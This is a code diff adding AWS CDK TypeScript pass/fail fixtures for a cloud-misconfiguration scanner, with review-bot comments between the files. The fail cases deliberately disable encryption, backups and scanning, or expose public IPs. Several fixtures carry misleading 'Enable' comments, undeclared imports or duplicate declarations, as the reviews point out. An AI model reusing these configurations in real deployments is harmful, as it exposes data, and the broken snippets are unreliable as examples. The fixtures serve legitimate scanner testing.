@@ -0,0 +1,51 @@
+import * as cdk from 'aws-cdk-lib';
+import * as dynamodb from 'aws-cdk-lib/aws-dynamodb';
+
+export class DynamoDBStack extends cdk.Stack {
+ constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+ super(scope, id, props);
+
+ // Define the DynamoDB table
+ const table = new dynamodb.CfnTable(this, 'MyTable', {
+ tableName: 'MyTable',
+ attributeDefinitions: [{ attributeName: 'id', attributeType: 'S' }],
+ keySchema: [{ attributeName: 'id', keyType: 'HASH' }],
+ provisionedThroughput: {
+ readCapacityUnits: 5,
+ writeCapacityUnits: 5,
+ },
+ pointInTimeRecoverySpecification: {
+ pointInTimeRecoveryEnabled: false, // disable point-in-time recovery for the table
+ },
+ });
+ }
+}
+
+// Example usage
+const app = new cdk.App();
+new DynamoDBStack(app, 'DynamoDBStack');
+app.synth();
+
+
+export class DynamoDBStack extends cdk.Stack {
+ constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+ super(scope, id, props);
+
+ // Define the DynamoDB table with point-in-time recovery enabled
+ const table = new dynamodb.Table(this, 'MyTable', {
+ tableName: 'MyTable',
+ partitionKey: { name: 'id', type: dynamodb.AttributeType.STRING },
+ readCapacity: 5,
+ writeCapacity: 5,
+ removalPolicy: cdk.RemovalPolicy.DESTROY, // Optional: specify removal policy
+ timeToLiveAttribute: 'ttlAttribute', // Enable point-in-time recovery
+ pointInTimeRecovery: false, // Enable point-in-time recovery
+ });
+ }
+}
+
+// Example usage
+const app = new cdk.App();
+new DynamoDBStack(app, 'DynamoDBStack');
+app.synth();
+
diff --git a/cdk_integration_tests/src/typescript/DynamodcRecovery/pass.ts b/cdk_integration_tests/src/typescript/DynamodcRecovery/pass.ts
new file mode 100644
index 00000000000..f1ec4c4c0c6
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/DynamodcRecovery/pass.ts
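Review bot: `timeToLiveAttribute: 'ttlAttribute', // Enable point-in-time recovery` in the second stack is mislabelled; TTL is unrelated to PITR, and the comment on the `pointInTimeRecovery: false,` line below it likewise says "Enable" for a disabled value, so those two should read `// Optional: TTL attribute` and `// PITR disabled: expected finding`. The directory name `DynamodcRecovery` looks like a typo for `DynamodbRecovery`; if the harness maps fixture directories to check names, that should be confirmed before merge. The same TTL comment appears in pass.ts in the next hunk.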
@@ -0,0 +1,50 @@ +import * as cdk from 'aws-cdk-lib'; +import * as dynamodb from 'aws-cdk-lib/aws-dynamodb'; + +export class DynamoDBStack extends cdk.Stack { + constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) { + super(scope, id, props); + + // Define the DynamoDB table + const table = new dynamodb.CfnTable(this, 'MyTable', { + tableName: 'MyTable', + attributeDefinitions: [{ attributeName: 'id', attributeType: 'S' }], + keySchema: [{ attributeName: 'id', keyType: 'HASH' }], + provisionedThroughput: { + readCapacityUnits: 5, + writeCapacityUnits: 5, + }, + pointInTimeRecoverySpecification: { + pointInTimeRecoveryEnabled: true, // Enable point-in-time recovery for the table + }, + }); + } +} + +// Example usage +const app = new cdk.App(); +new DynamoDBStack(app, 'DynamoDBStack'); +app.synth(); + + +export class DynamoDBStack extends cdk.Stack { + constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) { + super(scope, id, props); + + // Define the DynamoDB table with point-in-time recovery enabled + const table = new dynamodb.Table(this, 'MyTable', { + tableName: 'MyTable', + partitionKey: { name: 'id', type: dynamodb.AttributeType.STRING }, + readCapacity: 5, + writeCapacity: 5, + removalPolicy: cdk.RemovalPolicy.DESTROY, // Optional: specify removal policy + timeToLiveAttribute: 'ttlAttribute', // Enable point-in-time recovery + pointInTimeRecovery: true, // Enable point-in-time recovery + }); + } +} + +// Example usage +const app = new cdk.App(); +new DynamoDBStack(app, 'DynamoDBStack'); +app.synth(); diff --git a/cdk_integration_tests/src/typescript/EBSEncryption/fail__2__.ts b/cdk_integration_tests/src/typescript/EBSEncryption/fail__2__.ts new file mode 100644 index 00000000000..6cebaf4e5b1 --- /dev/null +++ b/cdk_integration_tests/src/typescript/EBSEncryption/fail__2__.ts 
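Review bot: Same mislabelled comment as in the fail fixture: `timeToLiveAttribute: 'ttlAttribute', // Enable point-in-time recovery` — TTL does not enable PITR; `pointInTimeRecovery: true` on the next line does. Suggest `timeToLiveAttribute: 'ttlAttribute', // TTL expiry attribute; not related to PITR`. As in the fail fixture, `DynamoDBStack` and `app` are each declared twice in one file, so a distinct name for the second stack and app would keep this compilable if the fixtures are ever built rather than only parsed.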
@@ -0,0 +1,66 @@ +import * as cdk from 'aws-cdk-lib'; +import * as ec2 from 'aws-cdk-lib/aws-ec2'; + +export class EC2Stack extends cdk.Stack { + constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) { + super(scope, id, props); + + // Create an EC2 instance + const instance = new ec2.Instance(this, 'MyInstance', { + instanceType: ec2.InstanceType.of(ec2.InstanceClass.T2, ec2.InstanceSize.MICRO), + machineImage: ec2.MachineImage.latestAmazonLinux(), + vpc: new ec2.Vpc(this, 'MyVpc'), + }); + + // Create an EBS volume with encryption enabled + const volume = new ec2.Volume(this, 'MyVolume', { + availabilityZone: instance.instanceAvailabilityZone, + size: ec2.Size.gibibytes(10), // Specify the volume size + encrypted: false, // Disable encryption for the volume + }); + + // Attach the volume to the instance + instance.instance.addVolumeAttachment('MyVolumeAttachment', { + volume, + device: '/dev/sdf', // Specify the device name + }); + } +} + +// Example usage +const app = new cdk.App(); +new EC2Stack(app, 'EC2Stack'); +app.synth(); + + +export class EC2Stack extends cdk.Stack { + constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) { + super(scope, id, props); + + // Create an EC2 instance + const instance = new ec2.Instance(this, 'MyInstance', { + instanceType: ec2.InstanceType.of(ec2.InstanceClass.T2, ec2.InstanceSize.MICRO), + machineImage: ec2.MachineImage.latestAmazonLinux(), + vpc: new ec2.Vpc(this, 'MyVpc'), + }); + + // Create an EBS volume with encryption enabled + const volume = new ec2.CfnVolume(this, 'MyVolume', { + availabilityZone: instance.instanceAvailabilityZone, + size: 10, // Specify the volume size in GiB + encrypted: false, // Enable encryption for the volume + }); + + // Attach the volume to the instance + new ec2.CfnVolumeAttachment(this, 'MyVolumeAttachment', { + instanceId: instance.instanceId, + volumeId: volume.ref, + device: '/dev/sdf', // Specify the device name + }); + } +} + +// Example usage +const app 
= new cdk.App(); +new EC2Stack(app, 'EC2Stack'); +app.synth(); diff --git a/cdk_integration_tests/src/typescript/EBSEncryption/pass.ts b/cdk_integration_tests/src/typescript/EBSEncryption/pass.ts new file mode 100644 index 00000000000..3210bf19204 --- /dev/null +++ b/cdk_integration_tests/src/typescript/EBSEncryption/pass.ts 
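Review bot: Both volume definitions say the opposite of what they configure — `// Create an EBS volume with encryption enabled` and `encrypted: false, // Enable encryption for the volume` sit on deliberately unencrypted volumes, which is actively misleading in a fail fixture; change them to `// Create an EBS volume WITHOUT encryption (expected check failure)` and `encrypted: false, // encryption disabled on purpose`. Separately, `instance.instance.addVolumeAttachment(...)` does not look like an existing API: `Instance.instance` is the underlying `CfnInstance`, and as far as I know attachment is expressed with `new ec2.CfnVolumeAttachment(...)` as the second half of this file already does (with `volume.grantAttachVolume` for the IAM side); worth confirming before this fixture is copied as an example. The two `EC2Stack` classes and two `const app` declarations in one file also collide at compile time.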
@@ -0,0 +1,67 @@ +import * as cdk from 'aws-cdk-lib'; +import * as ec2 from 'aws-cdk-lib/aws-ec2'; + +export class EC2Stack extends cdk.Stack { + constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) { + super(scope, id, props); + + // Create an EC2 instance + const instance = new ec2.Instance(this, 'MyInstance', { + instanceType: ec2.InstanceType.of(ec2.InstanceClass.T2, ec2.InstanceSize.MICRO), + machineImage: ec2.MachineImage.latestAmazonLinux(), + vpc: new ec2.Vpc(this, 'MyVpc'), + }); + + // Create an EBS volume with encryption enabled + const volume = new ec2.Volume(this, 'MyVolume', { + availabilityZone: instance.instanceAvailabilityZone, + size: ec2.Size.gibibytes(10), // Specify the volume size + encrypted: true, // Enable encryption for the volume + }); + + // Attach the volume to the instance + instance.instance.addVolumeAttachment('MyVolumeAttachment', { + volume, + device: '/dev/sdf', // Specify the device name + }); + } +} + +// Example usage +const app = new cdk.App(); +new EC2Stack(app, 'EC2Stack'); +app.synth(); + + + +export class EC2Stack extends cdk.Stack { + constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) { + super(scope, id, props); + + // Create an EC2 instance + const instance = new ec2.Instance(this, 'MyInstance', { + instanceType: ec2.InstanceType.of(ec2.InstanceClass.T2, ec2.InstanceSize.MICRO), + machineImage: ec2.MachineImage.latestAmazonLinux(), + vpc: new ec2.Vpc(this, 'MyVpc'), + }); + + // Create an EBS volume with encryption enabled + const volume = new ec2.CfnVolume(this, 'MyVolume', { + availabilityZone: instance.instanceAvailabilityZone, + size: 10, // Specify the volume size in GiB + encrypted: true, // Enable encryption for the volume + }); + + // Attach the volume to the instance + new ec2.CfnVolumeAttachment(this, 'MyVolumeAttachment', { + instanceId: instance.instanceId, + volumeId: volume.ref, + device: '/dev/sdf', // Specify the device name + }); + } +} + +// Example usage +const app 
= new cdk.App(); +new EC2Stack(app, 'EC2Stack'); +app.synth(); diff --git a/cdk_integration_tests/src/typescript/EC2PublicIP/fail.ts b/cdk_integration_tests/src/typescript/EC2PublicIP/fail.ts new file mode 100644 index 00000000000..a73de1831e2 --- /dev/null +++ b/cdk_integration_tests/src/typescript/EC2PublicIP/fail.ts @@ -0,0 +1,35 @@ +import * as cdk from 'aws-cdk-lib'; +import * as ec2 from 'aws-cdk-lib/aws-ec2'; +import {Construct} from 'constructs'; + +export class exampleStack extends cdk.Stack { + constructor(scope: Construct, id: string, props?: cdk.StackProps) { + super(scope, id, props); + + const vpc = new ec2.Vpc(this, 'VPC', { + cidr: '10.0.0.0/16', + natGateways: 0, + maxAzs: 2, + subnetConfiguration: [ + { + name: 'public-subnet-1', + subnetType: ec2.SubnetType.PUBLIC, + cidrMask: 24, + }, + ], + }); + + const instance = new ec2.Instance(this, 'Instance', { + vpc, + vpcSubnets: {subnetGroupName: 'public-subnet-1'}, + instanceType: ec2.InstanceType.of(ec2.InstanceClass.T3, ec2.InstanceSize.NANO), + machineImage: new ec2.AmazonLinuxImage({generation: ec2.AmazonLinuxGeneration.AMAZON_LINUX_2}), + detailedMonitoring: true, + associatePublicIpAddress: true + }); + } +} + +const app = new cdk.App(); +new exampleStack(app, 'example-stack'); +app.synth(); diff --git a/cdk_integration_tests/src/typescript/EC2PublicIP/fail_2.ts b/cdk_integration_tests/src/typescript/EC2PublicIP/fail_2.ts new file mode 100644 index 00000000000..10a70dfb5dd --- /dev/null +++ b/cdk_integration_tests/src/typescript/EC2PublicIP/fail_2.ts 
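Review bot: `size: ec2.Size.gibibytes(10)` reaches `Size` through the ec2 namespace, but I believe `Size` is exported from the core `aws-cdk-lib` module (`cdk.Size.gibibytes(10)`), so this line would not type-check; Checkov only parses the fixture so the test still works, but it is the kind of snippet people copy. `encrypted: true` without a `kmsKey` falls back to the account's default `aws/ebs` key, which satisfies the check but is worth stating: `encrypted: true, // uses the AWS-managed aws/ebs key; set kmsKey for a CMK`. As in the fail fixture, `EC2Stack` and `app` are declared twice in one file and `instance.instance.addVolumeAttachment` is, as far as I can tell, not a real method.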
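Review bot: `cidr: '10.0.0.0/16'` on `ec2.Vpc` is the deprecated v1-style prop; in current `aws-cdk-lib` the form is `ipAddresses: ec2.IpAddresses.cidr('10.0.0.0/16')`, and the deprecated prop emits a warning at synth — better to use the current form in a fixture people will copy. `const instance = ...` is never read, so `new ec2.Instance(...)` alone avoids an unused-variable lint. The fail condition itself, `associatePublicIpAddress: true`, is clear.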
@@ -0,0 +1,37 @@ +import * as cdk from 'aws-cdk-lib'; +import * as ec2 from 'aws-cdk-lib/aws-ec2'; +import {Construct} from 'constructs'; + +export class exampleStack extends cdk.Stack { + constructor(scope: Construct, id: string, props?: cdk.StackProps) { + super(scope, id, props); + + const vpc = new ec2.Vpc(this, 'VPC', { + cidr: '10.0.0.0/16', + natGateways: 0, + maxAzs: 2, + subnetConfiguration: [ + { + name: 'public-subnet-1', + subnetType: ec2.SubnetType.PUBLIC, + cidrMask: 24, + }, + ], + }); + + const sg1 = new ec2.SecurityGroup(this, 'sg1', { + vpc: vpc, + }); + + const launchTemplate = new ec2.LaunchTemplate(this, 'LaunchTemplate', { + machineImage: ec2.MachineImage.latestAmazonLinux2023(), + securityGroup: sg1, + associatePublicIpAddress: true + }); + + } +} + +const app = new cdk.App(); +new exampleStack(app, 'example-stack'); +app.synth(); diff --git a/cdk_integration_tests/src/typescript/EC2PublicIP/pass.ts b/cdk_integration_tests/src/typescript/EC2PublicIP/pass.ts new file mode 100644 index 00000000000..ec1c92969e1 --- /dev/null +++ b/cdk_integration_tests/src/typescript/EC2PublicIP/pass.ts 
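Review bot: File naming is inconsistent across the new fixtures — this one is `fail_2.ts`, while DynamodcRecovery and EBSEncryption use `fail__2__.ts`; if the integration harness discovers cases by a glob or a fixed name list, one of the two spellings is presumably not picked up, so check `cdk_integration_tests` for which pattern it expects (the harness is not visible in this diff). The directory name `DynamodcRecovery` also looks like a typo for `DynamodbRecovery`. Minor: `launchTemplate` is assigned and never used; `new ec2.LaunchTemplate(...)` alone would do.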
@@ -0,0 +1,35 @@ +import * as cdk from 'aws-cdk-lib'; +import * as ec2 from 'aws-cdk-lib/aws-ec2'; +import {Construct} from 'constructs'; + +export class exampleStack extends cdk.Stack { + constructor(scope: Construct, id: string, props?: cdk.StackProps) { + super(scope, id, props); + + const vpc = new ec2.Vpc(this, 'VPC', { + cidr: '10.0.0.0/16', + natGateways: 0, + maxAzs: 2, + subnetConfiguration: [ + { + name: 'public-subnet-1', + subnetType: ec2.SubnetType.PUBLIC, + cidrMask: 24, + }, + ], + }); + + const instance = new ec2.Instance(this, 'Instance', { + vpc, + vpcSubnets: {subnetGroupName: 'public-subnet-1'}, + instanceType: ec2.InstanceType.of(ec2.InstanceClass.T3, ec2.InstanceSize.NANO), + machineImage: new ec2.AmazonLinuxImage({generation: ec2.AmazonLinuxGeneration.AMAZON_LINUX_2}), + detailedMonitoring: true, + associatePublicIpAddress: false + }); + } +} + +const app = new cdk.App(); +new exampleStack(app, 'example-stack'); +app.synth(); diff --git a/cdk_integration_tests/src/typescript/ECRImageScanning/fail.ts b/cdk_integration_tests/src/typescript/ECRImageScanning/fail.ts new file mode 100644 index 00000000000..6e03ea4118a --- /dev/null +++ b/cdk_integration_tests/src/typescript/ECRImageScanning/fail.ts @@ -0,0 +1,14 @@ +import * as cdk from 'aws-cdk-lib'; +import * as ecr from 'aws-cdk-lib/aws-ecr'; +import {Construct} from 'constructs'; + +export class exampleStack extends cdk.Stack { + constructor(scope: Construct, id: string, props?: cdk.StackProps) { + super(scope, id, props); + const repository = new ecr.Repository(this, 'Repo', {} ); + } +} + +const app = new cdk.App(); +new exampleStack(app, 'example-stack'); +app.synth(); diff --git a/cdk_integration_tests/src/typescript/ECRImageScanning/pass.ts b/cdk_integration_tests/src/typescript/ECRImageScanning/pass.ts new file mode 100644 index 00000000000..196f3065018 --- /dev/null +++ b/cdk_integration_tests/src/typescript/ECRImageScanning/pass.ts 
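Review bot: The empty props object in `new ecr.Repository(this, 'Repo', {} )` gives no hint which check this fixture is meant to fail, and the same blob (`6e03ea4118a`) is reused unchanged as the ECRImmutableTags and ECRRepositoryEncrypted fail cases; a one-line comment per copy, e.g. `// imageScanOnPush omitted on purpose: scan-on-push not enabled`, would document the intent and stop the three files being interchangeable. The L2 `Repository` default for `imageScanOnPush` is, I believe, `false`, so this is a genuine failure at synth time too, not only a missing-prop failure for the static policy.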
@@ -0,0 +1,16 @@ +import * as cdk from 'aws-cdk-lib'; +import * as ecr from 'aws-cdk-lib/aws-ecr'; +import {Construct} from 'constructs'; + +export class exampleStack extends cdk.Stack { + constructor(scope: Construct, id: string, props?: cdk.StackProps) { + super(scope, id, props); + const repository = new ecr.Repository(this, 'Repo', { + imageScanOnPush: true + } ); + } +} + +const app = new cdk.App(); +new exampleStack(app, 'example-stack'); +app.synth(); diff --git a/cdk_integration_tests/src/typescript/ECRImmutableTags/fail.ts b/cdk_integration_tests/src/typescript/ECRImmutableTags/fail.ts new file mode 100644 index 00000000000..6e03ea4118a --- /dev/null +++ b/cdk_integration_tests/src/typescript/ECRImmutableTags/fail.ts @@ -0,0 +1,14 @@ +import * as cdk from 'aws-cdk-lib'; +import * as ecr from 'aws-cdk-lib/aws-ecr'; +import {Construct} from 'constructs'; + +export class exampleStack extends cdk.Stack { + constructor(scope: Construct, id: string, props?: cdk.StackProps) { + super(scope, id, props); + const repository = new ecr.Repository(this, 'Repo', {} ); + } +} + +const app = new cdk.App(); +new exampleStack(app, 'example-stack'); +app.synth(); diff --git a/cdk_integration_tests/src/typescript/ECRImmutableTags/pass.ts b/cdk_integration_tests/src/typescript/ECRImmutableTags/pass.ts new file mode 100644 index 00000000000..dc6514158fd --- /dev/null +++ b/cdk_integration_tests/src/typescript/ECRImmutableTags/pass.ts @@ -0,0 +1,16 @@ +import * as cdk from 'aws-cdk-lib'; +import * as ecr from 'aws-cdk-lib/aws-ecr'; +import {Construct} from 'constructs'; + +export class exampleStack extends cdk.Stack { + constructor(scope: Construct, id: string, props?: cdk.StackProps) { + super(scope, id, props); + const repository = new ecr.Repository(this, 'Repo', { + imageTagMutability: ecr.TagMutability.IMMUTABLE + }); + } +} + +const app = new cdk.App(); +new exampleStack(app, 'example-stack'); +app.synth(); 
diff --git a/cdk_integration_tests/src/typescript/ECRRepositoryEncrypted/fail.ts b/cdk_integration_tests/src/typescript/ECRRepositoryEncrypted/fail.ts new file mode 100644 index 00000000000..6e03ea4118a --- /dev/null +++ b/cdk_integration_tests/src/typescript/ECRRepositoryEncrypted/fail.ts @@ -0,0 +1,14 @@ +import * as cdk from 'aws-cdk-lib'; +import * as ecr from 'aws-cdk-lib/aws-ecr'; +import {Construct} from 'constructs'; + +export class exampleStack extends cdk.Stack { + constructor(scope: Construct, id: string, props?: cdk.StackProps) { + super(scope, id, props); + const repository = new ecr.Repository(this, 'Repo', {} ); + } +} + +const app = new cdk.App(); +new exampleStack(app, 'example-stack'); +app.synth(); diff --git a/cdk_integration_tests/src/typescript/ECRRepositoryEncrypted/pass.ts b/cdk_integration_tests/src/typescript/ECRRepositoryEncrypted/pass.ts new file mode 100644 index 00000000000..07bed88fd73 --- /dev/null +++ b/cdk_integration_tests/src/typescript/ECRRepositoryEncrypted/pass.ts @@ -0,0 +1,16 @@ +import * as cdk from 'aws-cdk-lib'; +import * as ecr from 'aws-cdk-lib/aws-ecr'; +import {Construct} from 'constructs'; + +export class exampleStack extends cdk.Stack { + constructor(scope: Construct, id: string, props?: cdk.StackProps) { + super(scope, id, props); + const repository = new ecr.Repository(this, 'Repo', { + encryption: ecr.RepositoryEncryption.KMS + }); + } +} + +const app = new cdk.App(); +new exampleStack(app, 'example-stack'); +app.synth(); diff --git a/cdk_integration_tests/src/typescript/ECRRepositoryEncrypted/pass_2.ts b/cdk_integration_tests/src/typescript/ECRRepositoryEncrypted/pass_2.ts new file mode 100644 index 00000000000..7be14b9ccd2 --- /dev/null +++ b/cdk_integration_tests/src/typescript/ECRRepositoryEncrypted/pass_2.ts 
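Review bot: `encryption: ecr.RepositoryEncryption.KMS` with no `encryptionKey` resolves to the AWS-managed `aws/ecr` key, which satisfies the check but is worth stating since readers may assume a customer-managed key is in play: `encryption: ecr.RepositoryEncryption.KMS, // AWS-managed aws/ecr key; pass encryptionKey for a CMK`. The sibling fail fixture is a bare `Repository`, which ECR still encrypts with AES-256 by default, so the distinction the policy draws is KMS versus AES-256 rather than encrypted versus plaintext; a comment to that effect in the fail case would prevent it being read as "unencrypted".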
@@ -0,0 +1,16 @@ +import * as cdk from 'aws-cdk-lib'; +import * as ecr from 'aws-cdk-lib/aws-ecr'; +import {Construct} from 'constructs'; + +export class exampleStack extends cdk.Stack { + constructor(scope: Construct, id: string, props?: cdk.StackProps) { + super(scope, id, props); + const repository = new ecr.Repository(this, 'Repo', { + encryptionKey: new kms.Key(this, 'Key') + }); + } +} + +const app = new cdk.App(); +new exampleStack(app, 'example-stack'); +app.synth(); diff --git a/cdk_integration_tests/src/typescript/ECSClusterContainerInsights/fail.ts b/cdk_integration_tests/src/typescript/ECSClusterContainerInsights/fail.ts new file mode 100644 index 00000000000..0b426ff64bd --- /dev/null +++ b/cdk_integration_tests/src/typescript/ECSClusterContainerInsights/fail.ts @@ -0,0 +1,16 @@ +import * as cdk from 'aws-cdk-lib'; +import * as ecs from 'aws-cdk-lib/aws-ecs'; +import * as ec2 from 'aws-cdk-lib/aws-ec2'; +import {Construct} from 'constructs'; + +export class exampleStack extends cdk.Stack { + constructor(scope: Construct, id: string, props?: cdk.StackProps) { + super(scope, id, props); + const vpc = new ec2.Vpc(this, 'Vpc', {maxAzs: 1}); + const cluster = new ecs.Cluster(this, 'EcsCluster', {vpc}); + } +} + +const app = new cdk.App(); +new exampleStack(app, 'example-stack'); +app.synth(); diff --git a/cdk_integration_tests/src/typescript/ECSClusterContainerInsights/pass.ts b/cdk_integration_tests/src/typescript/ECSClusterContainerInsights/pass.ts new file mode 100644 index 00000000000..55bbc6d5b4d --- /dev/null +++ b/cdk_integration_tests/src/typescript/ECSClusterContainerInsights/pass.ts 
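Review bot: `encryptionKey: new kms.Key(this, 'Key')` uses `kms` without importing it — the file only imports `cdk`, `ecr` and `Construct` — so this fixture does not compile; add `import * as kms from 'aws-cdk-lib/aws-kms';` beside the other imports. Checkov's parser still sees the prop, which is presumably why the test passes, but a fixture that is also valid TypeScript is a better example. Supplying `encryptionKey` makes the L2 construct select KMS encryption on its own, as far as I recall, so a comment `// supplying a key implies encryption: KMS` would explain why `encryption` is not set here.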
@@ -0,0 +1,16 @@ +import * as cdk from 'aws-cdk-lib'; +import * as ecs from 'aws-cdk-lib/aws-ecs'; +import * as ec2 from 'aws-cdk-lib/aws-ec2'; +import {Construct} from 'constructs'; + +export class exampleStack extends cdk.Stack { + constructor(scope: Construct, id: string, props?: cdk.StackProps) { + super(scope, id, props); + const vpc = new ec2.Vpc(this, 'Vpc', {maxAzs: 1}); + const cluster = new ecs.Cluster(this, 'EcsCluster', {vpc, containerInsights: true}); + } +} + +const app = new cdk.App(); +new exampleStack(app, 'example-stack'); +app.synth(); diff --git a/cdk_integration_tests/src/typescript/ECSTaskDefinitionEFSVolumeEncryption/fail.ts b/cdk_integration_tests/src/typescript/ECSTaskDefinitionEFSVolumeEncryption/fail.ts new file mode 100644 index 00000000000..2cae3e163f8 --- /dev/null +++ b/cdk_integration_tests/src/typescript/ECSTaskDefinitionEFSVolumeEncryption/fail.ts @@ -0,0 +1,24 @@ +import * as cdk from 'aws-cdk-lib'; +import * as ecs from 'aws-cdk-lib/aws-ecs'; +import {Construct} from 'constructs'; + +export class exampleStack extends cdk.Stack { + constructor(scope: Construct, id: string, props?: cdk.StackProps) { + super(scope, id, props); + const taskDefinition = new ecs.Ec2TaskDefinition(this, 'TaskDef', { + volumes: + [ + { + name:"my-volume", + efsVolumeConfiguration:{ + transitEncryption: "DISABLED" + } + } + ] + }); + } +} + +const app = new cdk.App(); +new exampleStack(app, 'example-stack'); +app.synth(); diff --git a/cdk_integration_tests/src/typescript/ECSTaskDefinitionEFSVolumeEncryption/fail_2.ts b/cdk_integration_tests/src/typescript/ECSTaskDefinitionEFSVolumeEncryption/fail_2.ts new file mode 100644 index 00000000000..9cd3fb9954c --- /dev/null +++ b/cdk_integration_tests/src/typescript/ECSTaskDefinitionEFSVolumeEncryption/fail_2.ts 
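Review bot: `containerInsights: true` is, in recent `aws-cdk-lib` releases, the deprecated form — `containerInsightsV2: ecs.ContainerInsights.ENABLED` (or `ENHANCED`) replaced it; if the CDK policy only matches the boolean prop, a stack written with the newer enum would be reported as failing even though insights are on. Worth adding a second pass fixture with the V2 form, or at least a `// TODO: also cover containerInsightsV2` note, once you confirm which CDK versions the check targets (the harness version pin is not visible here).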
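Review bot: `efsVolumeConfiguration: { transitEncryption: "DISABLED" }` omits `fileSystemId`, which as far as I recall is the one required field of `EfsVolumeConfiguration`, so the fixture would not type-check; adding `fileSystemId: 'fs-12345678',` keeps it valid without changing what the check inspects. A comment such as `// transit encryption explicitly off — expected check failure` would also make the purpose self-evident, since the same volume shape recurs in `fail_2.ts` and `pass.ts`.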
@@ -0,0 +1,24 @@ +import * as cdk from 'aws-cdk-lib'; +import * as ecs from 'aws-cdk-lib/aws-ecs'; +import {Construct} from 'constructs'; + +export class exampleStack extends cdk.Stack { + constructor(scope: Construct, id: string, props?: cdk.StackProps) { + super(scope, id, props); + const taskDefinition = new ecs.FargateTaskDefinition(this, 'TaskDef', { + volumes: + [ + { + name:"my-volume", + efsVolumeConfiguration:{ + transitEncryption: "DISABLED" + } + } + ] + }); + } +} + +const app = new cdk.App(); +new exampleStack(app, 'example-stack'); +app.synth(); diff --git a/cdk_integration_tests/src/typescript/ECSTaskDefinitionEFSVolumeEncryption/pass.ts b/cdk_integration_tests/src/typescript/ECSTaskDefinitionEFSVolumeEncryption/pass.ts new file mode 100644 index 00000000000..a08d3ba958b --- /dev/null +++ b/cdk_integration_tests/src/typescript/ECSTaskDefinitionEFSVolumeEncryption/pass.ts @@ -0,0 +1,24 @@ +import * as cdk from 'aws-cdk-lib'; +import * as ecs from 'aws-cdk-lib/aws-ecs'; +import {Construct} from 'constructs'; + +export class exampleStack extends cdk.Stack { + constructor(scope: Construct, id: string, props?: cdk.StackProps) { + super(scope, id, props); + const taskDefinition = new ecs.Ec2TaskDefinition(this, 'TaskDef', { + volumes: + [ + { + name:"my-volume", + efsVolumeConfiguration:{ + transitEncryption: "ENABLED" + } + } + ] + }); + } +} + +const app = new cdk.App(); +new exampleStack(app, 'example-stack'); +app.synth(); diff --git a/cdk_integration_tests/src/typescript/EFSEncryptionEnabled/fail.ts b/cdk_integration_tests/src/typescript/EFSEncryptionEnabled/fail.ts new file mode 100644 index 00000000000..bc3dde2d494 --- /dev/null +++ b/cdk_integration_tests/src/typescript/EFSEncryptionEnabled/fail.ts 
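Review bot: The pass case only covers `Ec2TaskDefinition`, while the fail cases cover both `Ec2TaskDefinition` and `FargateTaskDefinition`; if the policy is keyed on construct type, the Fargate pass path is untested — add a `pass_2.ts` mirroring `fail_2.ts` with `transitEncryption: "ENABLED"`. The missing required `fileSystemId` noted on the fail fixture applies here too. A comment beside `transitEncryption: "ENABLED"` that IAM-authorised EFS access (`authorizationConfig: { iam: 'ENABLED' }`) depends on transit encryption would explain why the setting matters, if that fits the fixture's purpose.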
@@ -0,0 +1,17 @@ +import * as cdk from 'aws-cdk-lib'; +import * as ec2 from 'aws-cdk-lib/aws-ec2'; +import * as efs from 'aws-cdk-lib/aws-efs'; +import {Construct} from 'constructs'; + +export class exampleStack extends cdk.Stack { + constructor(scope: Construct, id: string, props?: cdk.StackProps) { + super(scope, id, props); + const fileSystem = new efs.FileSystem(this, 'MyEfsFileSystem', { + vpc: new ec2.Vpc(this, 'VPC') + }); + } +} + +const app = new cdk.App(); +new exampleStack(app, 'example-stack'); +app.synth(); diff --git a/cdk_integration_tests/src/typescript/EFSEncryptionEnabled/pass.ts b/cdk_integration_tests/src/typescript/EFSEncryptionEnabled/pass.ts new file mode 100644 index 00000000000..51017b7afad --- /dev/null +++ b/cdk_integration_tests/src/typescript/EFSEncryptionEnabled/pass.ts @@ -0,0 +1,18 @@ +import * as cdk from 'aws-cdk-lib'; +import * as ec2 from 'aws-cdk-lib/aws-ec2'; +import * as efs from 'aws-cdk-lib/aws-efs'; +import {Construct} from 'constructs'; + +export class exampleStack extends cdk.Stack { + constructor(scope: Construct, id: string, props?: cdk.StackProps) { + super(scope, id, props); + const fileSystem = new efs.FileSystem(this, 'MyEfsFileSystem', { + vpc: new ec2.Vpc(this, 'VPC'), + encrypted: true + }); + } +} + +const app = new cdk.App(); +new exampleStack(app, 'example-stack'); +app.synth(); diff --git a/cdk_integration_tests/src/typescript/EKSSecretsEncryption/fail.ts b/cdk_integration_tests/src/typescript/EKSSecretsEncryption/fail.ts new file mode 100644 index 00000000000..1b790ebdb79 --- /dev/null +++ b/cdk_integration_tests/src/typescript/EKSSecretsEncryption/fail.ts 
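Review bot: The fail fixture relies on `encrypted` being absent, but in `aws-cdk-lib` v2 the `@aws-cdk/aws-efs:defaultEncryptionAtRest` feature flag is, as far as I recall, on by default, so this `efs.FileSystem` actually synthesizes with `Encrypted: true` and the static policy flags a file system CloudFormation would create encrypted. That is a property of source-level scanning rather than a bug in the fixture, but either set `encrypted: false, // explicitly unencrypted — expected check failure` here so the case is unambiguous, or document in the policy that an absent prop is treated as unencrypted. Please confirm the flag default against the CDK version the harness pins.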
@@ -0,0 +1,21 @@ +import * as cdk from 'aws-cdk-lib'; +import {aws_eks as eks} from 'aws-cdk-lib'; +import {Construct} from 'constructs'; + +export class exampleStack extends cdk.Stack { + constructor(scope: Construct, id: string, props?: cdk.StackProps) { + super(scope, id, props); + const cfnCluster = new eks.CfnCluster(this, 'MyCfnCluster', { + resourcesVpcConfig: { + subnetIds: ['subnetIds'] + }, + roleArn: 'roleArn', + name: 'name', + version: 'version' + }); + } +} + +const app = new cdk.App(); +new exampleStack(app, 'example-stack'); +app.synth(); diff --git a/cdk_integration_tests/src/typescript/EKSSecretsEncryption/pass.ts b/cdk_integration_tests/src/typescript/EKSSecretsEncryption/pass.ts new file mode 100644 index 00000000000..5b8734d322b --- /dev/null +++ b/cdk_integration_tests/src/typescript/EKSSecretsEncryption/pass.ts @@ -0,0 +1,24 @@ +import * as cdk from 'aws-cdk-lib'; +import {aws_eks as eks} from 'aws-cdk-lib'; +import {Construct} from 'constructs'; + +export class exampleStack extends cdk.Stack { + constructor(scope: 